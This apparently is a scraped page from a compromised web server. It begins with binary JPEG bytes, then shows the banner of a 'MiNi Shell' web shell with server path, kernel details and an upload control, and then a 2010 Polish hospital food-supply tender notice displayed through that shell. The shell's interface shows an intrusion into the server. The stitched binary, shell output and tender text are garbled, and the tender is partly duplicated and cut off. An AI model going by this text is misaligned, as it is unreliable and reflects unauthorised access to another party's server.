JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101011/327148-N-2010.html

<p class="kh_header"><b>Radom: Zakup i dostawa produktów spożywczych: mleka i produktów mlecznych, mięsa i wędlin,  pieczywa, produktów drobiowych oraz jaj  dla potrzeb Radomskiego Szpitala Specjalistycznego</b><br>
<b>Numer ogłoszenia: 327148 - 2010; data zamieszczenia: 11.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Radomski Szpital Specjalistyczny im. dr Tytusa Chałubińskiego , ul. Tochtermana 1, 26-610 Radom, woj. mazowieckie, tel. 048 3615285, 3615284, faks 048 3615213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa produktów spożywczych: mleka i produktów mlecznych, mięsa i wędlin,  pieczywa, produktów drobiowych oraz jaj  dla potrzeb Radomskiego Szpitala Specjalistycznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Cześć  nr 1 - MLEKO I PRODUKTY MLECZNE

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.		Mleko od 1,5%-2%-wielkość opakowania jednostkowego-10L rodzaj opakowania-worek foliowy	37.000 L
2.		Śmietana 18%-wielkość opakowania jednostkowego od 0,5L-5L 
	1.600 L
3.		Masło ex.o zawartości tłuszczu- minimum 82%-wielkość opakowania jednostkowego-200g	850 kg
4.		Masło roślinne-o wartości energetycznej 721kcal,białka 0,05g,tłuszcze 80g,węglowodany0,025g w 100g produktu-wielkość opakowania jednostkowego-250g,rodzaj opakowania-kubek	2400 kg
5.		Twaróg półtłusty 	1800 kg
6.		Ser żółty podpuszczkowy Edamski,Ementaler,Gouda lub równoważny o zawartości tłuszczu minimum 27g w 100 g produktu	380 kg
7.		Ser topiony kremowy śmietankowy Hochland lub równoważny o wartości energetycznej-309kcal ,białka 8g w 100g produktu rodzaj opakowania krążek w opakowaniu-8szt trójkątów ,wielkość opakowania 200g	350 kg
8.		Serek homogenizowany waniliowy, truskawkowy Rolmlecz lub równoważny o wartości odżywczej 142kcal,białka -7g w 100 g produktu, wielkość opakowania jednostkowego-max-150g	100 szt.
9.		Jogurt naturalny  o wartości energetycznej  minimum 53,5 kcal w 100g produktu ,wielkość opakowania jednostkowego-150g	1200 szt.
10.		Jogurt owocowy różne smaki Jogobella lub równoważny,
o wartości energetycznej minimum 70,4kcal w100g produktu
,wielkość opakowania jednostkowego-150g	50 szt.
11.		Ser topiony krążek mix,w opakowaniu 6 lub 8 trójkątów Hochland lub równoważny,wielkość opakowania jednostkowego max-200g	5 op.
12.		Jogurt pitnyMilko lub równoważny,różne smaki,o warości energetycznej 87 kcal,zawartośc tłuszczu 2 g w 100 g produktu wielkość opakowania jednostkowego-max-500g	15 szt.
13.		Jogurt z ziarnami zbóż z owocami Jogobella lub równoważny,8 zbóż, o zawartości owoców 8,5%,wielkość opakowania jednostkowego max-180g	25 szt.
14.		Jogurt owocowy Jogobella lub równoważny z dużymi kawałkami owoców, wielkość opakowania jednostkowego-max-180g	50 szt.
15.		Serek wiejski Piątnica lub równoważny o wartości energetycznej-81kcal,zawierający w swoim składzie twaróg ziarnisty, wielkość opakowania jednostkowego max-150g	25 szt.
16.		Serek wiejski Radomski lub równoważny o wartości energetycznej 97 kcal,tłuszcz 5 g w 100 g produktu, wielkość opakowania jednostkowego max-180g	25 szt.
17.		Kefir naturalny Rolmlecz lub równoważny  o zawartości tłuszczu 1,5%,wielkość opakowania jednostkowego max-500ml	25 szt.
18.		Mleko Łaciate lub równoważne zagęszczone niesłodzone o zawartości  tłuszczu  7,5%-wielkość opakowania jednostkowego max-250ml	15 szt.
19.		Maślanka  naturalna Rolmlecz lub równoważna o zawartości tłuszczu 0,9%,wielkość opakowania max-500ml	25szt.
20.		Wiejska Maślanka truskawkowa
wielkość opakowania jednostkowego max-500ml.	25szt
21.		Wiejska fantazja Rolmlecz ( mleko acydofilne)-różne smaki lub równoważna, zawierająca w swoim składzie mleko pasteryzowane oraz syrop owocowy 15% wielkość opakowania jednostkowego max-500ml.	25 szt.
22.		Ser topiony Hochland lub równoważny w plastrach pakowanych pojedynczo o zawartości tłuszczu 27g, białka 14g w 100 g produktu ,wielkość opakowania jednostkowego max-150g	15 szt.
23.		Ser żółty podpuszczkowy Salami, Edamski, Gouda Mlekpol lub równoważny w plastrach ,wielkość opakowania jednostkowego max-150g	15 szt.
24.		Masło ex wielkość opakowania jednostkowego max-10g	600 szt.
25.		Kefir owocowy różne smaki Figand lub równoważny o wartości energetycznej-282 kcal w 100 g produktu, wielkość opakowania jednostkowego max-400g	15 szt.
26.		 Fantazja-jogurt kremowy z (owocami, czekoladą, orzechami w czekoladzie) lub równoważny o wartości energetycznej121kcal w 100 g produktu, wielkość opakowania jednostkowego  max-122g	15 szt.
27.		Serek homogenizowany Danio lub równoważny o wartości energetycznej112kcal w 100 g produktu z mleka pasteryzowanego, wielkość opakowania jednostkowego max-150g	15 szt.
28.		Twist- jogurt ,kawowy, wiśniowy, truskawkowy, orzeźwiający ananas, orzeźwiająca zielona herbata Bakoma lub równoważny o wartości energetycznej-80kcal,zawartości tłuszczu-2g w 100 g produktu, wielkość opakowania jednostkowegomax-400g	15 szt.

Warunki dostaw przetworów mlecznych:
1.	Dostawa towarów określonych w pozycji 1 codziennie (7 razy w tygodniu) od godz. 5:00 do 5:30
2.	Dostawa towarów określonych w pozycji 2 do 28 - dostawa nie częściej niż dwa razy w tygodniu w dni robocze od 8:00 - 12:00.
3.	Realizacja zamówienia w dniu następującym po dniu złożenia zamówienia.
4.	Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).

Cześć  nr 2 - MIĘSO I WĘDLINY
LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Schab bez kości 	1.100 kg
2.	Karczek wieprzowy z kością	100kg
3.	Łopatka wieprzowa z kością bez skóry	750 kg
4.	Żeberka wieprzowe paski	40kg
5.	Szynka wieprzowa bez kości 	400 kg
6. 	Wołowina udziec bez kości 	2400 kg
7.	Wołowina z kością rozbratel	70kg
8.	Kości schabowe 	1300 kg
9.	Wątróbka wieprzowa	50kg
10.	Słonina bez skóry	240 kg
11.	Smalec	130 kg
12. 	Boczek wędzony 	60 kg
13. 	Kiełbasa toruńska 	190 kg
14. 	Schab pieczony 	10kg
15.	Parówki wieprzowe	260 kg
16. 	Kiełbasa krakowska wieprzowa 	480 kg
17.	Mortadela	200 kg
18. 	Kiełbasa szynkowa wieprzowa 	670 kg
19.	Baleron wieprzowy	120 kg
20. 	Szynka delikatesowa	530 kg
21.	Mielonka tyrolska	30 kg
22.	Szynka prasowana	600 kg
23.	Pieczeń rzymska	30 kg
24.	Szynka wiejska	360 kg
25.	Parówki jedynki 	500 szt.
26.	Kiełbasa zwyczajna	70 kg.

Warunki dostaw:
1.	Dostawy 2 razy w tygodniu w dni robocze, w godzinach od 8:00 do 12:00.
2.	Do każdej dostawy, na każdą partię produktu Wykonawca dołączy:
a)	 Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).
b)	Etykietę zawierającą minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia.

Część nr 3 - PIECZYWO

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Bułka pszenna - wrocławska/ gryzka  0, 35 - 0,45 kg	15.200 kg
2.	Chleb cały 0,50 - 0,60 kg	8.400 kg
3.	Bułki zwykłe 0,09 - 0,10 kg	14.800 szt.
4.	Bułka tarta, wielkość opakowania jednostkowego max - 1 kg	350 kg.
5.	Drożdżówki z serem, makiem, budyniem, jabłkiem, dżemem 0,08- 0,10 kg	1000 szt.
6. 	Pączki z nadzieniem 0,08-0,10 kg	550 szt.
7.	Groszek ptysiowy drobny	1 kg
8.	Bułka hamburger 0,09 - 0,11 kg 	380 szt.
9.	Bułka hot - dog 0,09 - 0,11 kg	380 szt.
10.	Suchary 	70 kg
11.	Jagodzianki 0,09 - 0,11 kg	840 szt.
12. 	Bułki grahamki 0,05 - 0,06 kg	600 szt.
13. 	Bułki zwykłe 0,05 - 0,06 kg	600 szt.
14. 	Chleb pełnoziarnisty 0,40 - 0,55 kg	240 szt.
15.	Chleb razowy 0,40 - 0,55 kg	240 szt.
16. 	Chleb ze słonecznikiem 0,40 - 0,55 kg	120 szt.
17.	Bułka ziołowa 0,08 - 0,11 kg	600 szt.


Warunki dostawy:
a)	Towar określony w poz. 1,2,3 - dostawa od poniedziałku do soboty (włącznie) w godzinach 5:00 - 6:00.
b)	Towar określony w poz. 4-17 - dostawa w zależności od potrzeb w dniu następującym po dniu złożenia zamówienia w godz. 5:00 - 7:00 w dni robocze od poniedziałku do piątku.

Cześć nr 4 - PRODUKTY DROBIOWE

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Kurczaki	5.300 kg
2.	Filet z piersi - kurczaka	1200 kg
3.	Udziec indyczy	1100 kg
4.	Udka z kurczaka	60kg
5.	Skrzydełka z kurczaka	10 kg
6. 	Filet z indyka 	15 kg
7.	Wątróbka drobiowa	120 kg
8.	Żołądki z kurczaka	35 kg
9.	Serca drobiowe	60 kg
10.	Polędwica drobiowa	300 kg
11.	Parówki drobiowe	50 kg
12. 	Krakowska drobiowa	150 kg
13. 	Pasztet drobiowy	300 kg
14. 	Baton drobiowy	110 kg

Warunki dostawy:
1.	Dostawa - 2 razy w tygodniu.
2.	Realizacja zamówienia w dniu następującym po dniu złożenia zamówienia
3.	Do każdej dostawy, na każdą partię produktu Wykonawca dołączy:
a)	 Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).
b)	Etykietę zawierającą minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia.


Cześć  nr 5 - JAJA

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.	Jaja świeże wielkość - L	30.000 szt.

Warunki dostawy:
1.	Dostawa jeden raz w tygodniu.
2.	Realizacja zamówienia w dniu następującym po dniu złożenia zamówienia.
3.	Do każdej dostawy, Wykonawca dołączy:
a)	Handlowy dokument identyfikacyjny zgodnie z ustawą z dnia 16 grudnia 2005r. o produktach pochodzenia zwierzęcego (Dz.U. 06.17, poz. 127 ze zm.).
b)	Etykietę zawierającą minimum: opis produktu, temperaturę przechowywania, datę przydatności do spożycia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.11.00.00-2, 15.11.10.00-9, 15.11.11.10-0, 15.11.30.00-3, 15.11.40.00-0, 15.13.11.20-2, 15.81.10.00-6, 15.81.10.00-6, 15.11.20.00-6, 15.11.23.00-9, 15.13.15.00-0, 03.14.25.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje środkiem transportu drogowego do przewozu środków spożywczych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Pełnomocnictwo do reprezentowania jeżeli ofertę składa pełnomocnik,
2.	Dokument dopuszczający do transportu żywności samochody transportowe dostawcy - Rozporządzenie Ministra Zdrowia z dnia 19 grudnia 2002r (Dz. U. Nr 21, poz. 179, 
z 2003r.).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się następującą zmianę umowy:
Ceny jednostkowe brutto mogą ulec zmianie w przypadku zmiany stawki podatku VAT wprowadzonej przepisami prawa- mogą się zmienić od dnia wejścia w życie danego aktu prawnego, przy czym zmianie ulegnie wyłącznie cena brutto.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.radom.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4, pok. 313.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2010 godzina 11:00, miejsce: Radomski Szpital Specjalistyczny
Dział Zamówień Publicznych Funduszy Strukturalnych i Zaopatrzenia
26-610 Radom, ul. Lekarska 4, pok. 313.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> MLEKO I PRODUKTY MLECZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cześć  nr 1 - MLEKO I PRODUKTY MLECZNE

LP.	Rodzaj artykułu	Ilość na 6 m-cy
1.		Mleko od 1,5%-2%-wielkość opakowania jednostkowego-10L rodzaj opakowania-worek foliowy	37.000 L
2.		Śmietana 18%-wielkość opakowania jednostkowego od 0,5L-5L 	1.600 L
3.		Masło ex.o zawartości tłuszczu- minimum 82%-wielkość opakowania jednostkowego-200g	850 kg
4.		Masło roślinne-o wartości energetycznej 721kcal,białka 0,05g,tłuszcze 80g,węglowodany0,025g w 100g produktu-wielkość opakowania jednostkowego-250g,rodzaj opakowania-kubek	2400 kg
5.		Twaróg półtłusty 	1800 kg
6.		Ser żółty podpuszczkowy Edamski, Ementaler, Gouda lub równoważny o zawartości tłuszczu minimum 27g w 100 g produktu	380 kg
7.		Ser topiony kremowy śmietankowy Hochland lub równoważny o wartości energetycznej-309kcal ,białka 8g w 100g produktu rodzaj opakowania krążek w opakowaniu-8szt trójkątów ,wielkość opakowania 200g	350 kg
8.		Serek homogenizowany waniliowy, truskawkowy Rolmlecz lub równoważny o wartości odżywczej 142kcal,białka -7g w 100 g produktu, wielkość opakowania jednostkowego-max-150g	100 szt.
9.		Jogurt naturalny  o wartości energetycznej  minimum 53,5 kcal w 100g produktu ,wielkość opakowania jednostkowego-150g	1200 szt.
10.		Jogurt owocowy różne smaki Jogobella lub równoważny, o wartości energetycznej minimum 70,4kcal w100g produktu, wielkość opakowania jednostkowego-150g	50 szt.
11.		Ser topiony krążek mix,w opakowaniu 6 lub 8 trójkątów Hochland lub równoważny,wielkość opakowania jednostkowego max-200g	5 op.
12.		Jogurt pitnyMilko lub równoważny,różne smaki,o warości energetycznej 87 kcal,zawartośc tłuszczu 2 g w 100 g produktu wielkość opakowania jednostkowego-max-500g	15 szt.
13.		Jogurt z ziarnami zbóż z owocami Jogobella lub równoważny,8 zbóż, o zawartości owoców 8,5%,wielkość opakowania jednostkowego max-180g	25 szt.
14.		Jogurt owocowy Jogobella lub równoważny z dużymi kawałkami owoców, wielkość opakowania jednostkowego-max-180g	50 szt.
15.		Serek wiejski Piątnica lub równoważny o wartości energetycznej-81kcal,zawierający w swoim składzie twaróg ziarnisty, wielkość opakowania jednostkowego max-150g	25 szt.
16.		Serek wiejski Radomski lub równoważny o wartości energetycznej 97 kcal, tłuszcz 5 g w 100 g produktu, wielkość opakowania jednostkowego max-180g	25 szt.
17.		Kefir naturalny Rolmlecz lub równoważny  o zawartości tłuszczu 1,5%,wielkość opakowania jednostkowego max-500ml	25 szt.
18.		Mleko Łaciate lub równoważne zagęszczone niesłodzone o zawartości  tłuszczu  7,5%-wielkość opakowania jednostkowego max-250ml	15 szt.
19.		Maślanka  naturalna Rolmlecz lub równoważna o zawartości tłuszczu 0,9%,wielkość opakowania max-500ml	25szt.
20.		Wiejska Maślanka truskawkowa
wielkość opakowania jednostkowego max-500ml.	25szt
21.		Wiejska fantazja Rolmlecz ( mleko acydofilne)-różne smaki lub równoważna, zawierająca w swoim składzie mleko pasteryzowane oraz syrop owocowy 15% wielkość opakowania jednostkowego max-500ml.	25 szt.
22.		Ser topiony Hochland lub równoważny w plastrach pakowanych pojedynczo o zawartości tłuszczu 27g, białka 14g w 100 g produktu ,wielkość opakowania jednostkowego max-150g	15 szt.
23.		Ser żółty podpuszczkowy Salami, Edamski, Gouda Mlekpol lub równoważny w plastrach ,wielkość opakowania jednostkowego max-150g	15 szt.
24.		Masło ex wielkość opakowania jednostkowego max-10g	600 szt.
25.		Kefir owocowy różne smaki Figand lub równoważny o wartości energetycznej-282 kcal w 100 g produktu, wielkość opakowania jednostkowego max-400g	15 szt.
26.		 Fantazja-jogurt kremowy z (owocami, czekoladą, orzechami w czekoladzie) lub równoważny o wartości energetycznej121kcal w 100 g produktu, wielkość opakowania jednostkowego  max-122g	15 szt.
27.		Serek homogenizowany Danio lub równoważny o wartości energetycznej112kcal w 100 g produktu z mleka pasteryzowanego, wielkość opakowania jednostkowego max-150g	15 szt.
28.		Twist- jogurt ,kawowy, wiśniowy, truskawkowy, orzeźwiający ananas, orzeźwiająca zielona herbata Bakoma lub równoważny o wartości energetycznej-80kcal,zawartości tłuszczu-2g w 100 g produktu, wielkość opakowania jednostkowegomax-400g	15 szt.

Warunki dostaw przetworów mlecznych:
1.	Dostawa towarów określonych w pozycji 1 codziennie (7 razy w tygodniu) od godz. 5:00 do 5:30
